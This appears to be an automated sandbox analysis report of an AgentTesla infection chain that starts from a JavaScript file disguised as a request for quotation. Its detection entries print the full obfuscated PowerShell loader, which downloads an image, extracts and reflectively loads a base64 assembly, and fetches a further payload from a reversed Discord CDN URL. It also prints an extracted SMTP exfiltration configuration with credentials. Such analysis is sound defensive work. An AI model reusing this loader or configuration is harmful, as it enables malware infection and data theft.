? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ?
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ?
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", ProcessId: 652, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ?

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ?
                      Timestamp:2024-08-27T07:53:45.960744+0200
                      SID:2020423
                      Severity:1
                      Source Port:443
                      Destination Port:49705
                      Protocol:TCP
                      Classtype:Exploit Kit Activity Detected
                      Timestamp:2024-08-27T07:53:44.733271+0200
                      SID:2049038
                      Severity:1
                      Source Port:443
                      Destination Port:49704
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpgAvira URL Cloud: Label: malware
                      Source: 8.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}
                      Source: RFQ448903423_MAT_HASUE_de_Mexico.jsVirustotal: Detection: 13%Perma Link
                      Source: unknownHTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
